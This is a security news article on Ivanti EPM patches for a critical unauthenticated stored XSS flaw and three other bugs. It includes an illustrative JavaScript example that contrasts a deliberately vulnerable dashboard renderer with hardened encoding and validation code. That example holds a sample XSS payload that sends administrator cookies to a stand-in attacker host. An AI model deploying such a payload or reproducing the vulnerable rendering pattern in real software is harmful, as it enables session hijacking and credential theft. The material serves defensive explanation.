SecurityWeek

Ivanti EPM Update Patches Critical Remote Code Execution Flaw

The stored XSS vulnerability could allow unauthenticated remote attackers to execute arbitrary JavaScript in an administrator's browser session, and thereby act with administrator privileges in the EPM console.


Ivanti on Tuesday announced patches for four vulnerabilities in Endpoint Manager (EPM), including a critical-severity flaw leading to remote code execution (RCE).

The security defect, tracked as CVE-2025-10573 (CVSS score of 9.6), is described as a stored cross-site scripting (XSS) issue that can be exploited without authentication.

Ivanti EPM provides organizations with remote administration, vulnerability scanning, and management of connected systems, and it includes an API that consumes device scan data and surfaces it in the web dashboard.

The critical EPM vulnerability allows attackers to submit device scan data containing malicious payloads that would be processed and embedded in the web dashboard, says Rapid7, which discovered and reported the bug in August.

When an administrator opens the dashboard and views the device information, the stored payload is rendered into the page and executes as client-side JavaScript, allowing the attacker to hijack the administrator's session and perform actions with the administrator's privileges, the company explains. The attacker never needs to interact with the administrator directly; the payload is delivered through the normal scan-ingestion path and waits for the next page view.
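The failure pattern described above, as an added illustration that is not Ivanti's code and not taken from Rapid7's report: a minimal device-inventory renderer in JavaScript that concatenates untrusted scan fields straight into HTML, beside a hardened version that output-encodes every field and validates the hostname at ingestion. The field names (hostname, os), the table markup, the regexes and the payload are assumptions constructed for the demo, not details of the EPM API.

```javascript
// Added example (hypothetical dashboard, not Ivanti EPM code).
// A scan record as an ingestion API might accept it. Because the API in
// the article is reachable without authentication, anything on the
// network can submit one. Both records below are constructed for the demo.
const maliciousScan = {
  hostname: '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)">',
  os: 'Windows 11',
};
const benignScan = { hostname: 'ws-0042', os: 'Windows 11' };

// VULNERABLE: untrusted fields are interpolated into markup unchanged, so
// the payload is stored verbatim and runs in every admin browser that
// later loads the inventory page (stored XSS).
function renderDeviceRowVulnerable(scan) {
  return `<tr><td>${scan.hostname}</td><td>${scan.os}</td></tr>`;
}

// Output encoding for the HTML text/attribute context: the five characters
// that can close an element or an attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// HARDENED (1): encode on output. The browser receives text, not markup,
// regardless of what was stored.
function renderDeviceRowSafe(scan) {
  return `<tr><td>${escapeHtml(scan.hostname)}</td><td>${escapeHtml(scan.os)}</td></tr>`;
}

// HARDENED (2): validate on input. A hostname has a tight grammar (RFC 1123
// labels: alphanumerics and hyphens, no leading/trailing hyphen, 63 chars
// per label), so the ingestion API can reject anything else before storing
// it. Defence in depth only: free-text fields such as an OS string cannot be
// allow-listed this way, so output encoding is still mandatory.
const HOSTNAME_RE =
  /^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$/;

function validateScan(scan) {
  if (typeof scan.hostname !== 'string' || !HOSTNAME_RE.test(scan.hostname)) {
    return { ok: false, reason: 'invalid hostname' };
  }
  if (typeof scan.os !== 'string' || scan.os.length > 128) {
    return { ok: false, reason: 'invalid os string' };
  }
  return { ok: true };
}

// Test oracle: does the rendered markup contain a live element carrying an
// event-handler attribute (a tag whose attributes include on...=)?  Escaped
// output never does, because "&lt;img" is not a tag.
function containsActiveMarkup(html) {
  return /<[a-z][^>]*\son\w+\s*=/i.test(html);
}

// Run both renderers over both records and summarise the outcome.
function demo() {
  return {
    vulnerableExecutesPayload: containsActiveMarkup(renderDeviceRowVulnerable(maliciousScan)),
    safeExecutesPayload: containsActiveMarkup(renderDeviceRowSafe(maliciousScan)),
    maliciousAccepted: validateScan(maliciousScan).ok,
    benignAccepted: validateScan(benignScan).ok,
  };
}

console.log(demo());
```

Note that validation alone would not have been enough: a scan record typically carries free-text fields (OS build strings, software names) that cannot be constrained to a safe alphabet, which is why the fix has to be contextual output encoding at the point where the dashboard emits the data.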

The bug has been fixed in Ivanti EPM 2024 SU4 SR1, which also patches three high-severity bugs.


The first, CVE-2025-13659, is described as improper control of dynamically managed code resources, which could allow remote, unauthenticated attackers to write arbitrary files on the server.

Successful exploitation of the security defect could lead to RCE, but user interaction is required, Ivanti notes in its advisory.

The second high-severity issue is CVE-2025-13661, a path traversal flaw that can be exploited remotely to write arbitrary files outside of the intended directory. Its exploitation requires authentication.

The third high-severity weakness is described as the “improper verification of cryptographic signatures in the patch management component” of EPM.

Tracked as CVE-2025-13662, it allows remote, unauthenticated attackers to achieve RCE, but requires user interaction.

Ivanti says it is not aware of any of these vulnerabilities being exploited in the wild. Users are advised to update to the latest versions of Ivanti EPM as soon as possible. Since three of the four flaws require no authentication, EPM instances whose console or APIs are reachable from untrusted networks should be patched first.

Related: High-Severity Vulnerabilities Patched by Ivanti and Zoom

Related: High-Severity Vulnerabilities Patched by Fortinet and Ivanti

Related: ZDI Drops 13 Unpatched Ivanti Endpoint Manager Vulnerabilities

Related: CISA Analyzes Malware From Ivanti EPMM Intrusions

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
